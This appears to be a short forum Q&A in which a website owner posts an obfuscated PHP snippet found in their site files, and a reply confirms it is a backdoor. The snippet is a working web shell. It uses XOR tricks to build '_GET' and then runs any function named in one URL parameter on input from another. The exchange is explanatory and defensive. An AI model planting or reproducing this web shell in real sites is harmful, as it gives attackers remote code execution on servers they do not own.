I found this code in my website files is that some kind of backdoor ?
can someone explain this code line by line
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>yes it is. It gets two values from $_GET with the keys _ and __ and then makes a function call to _ passing in __.
You can do lots of bad stuff when you can execute whatever function you want with whatever input you want.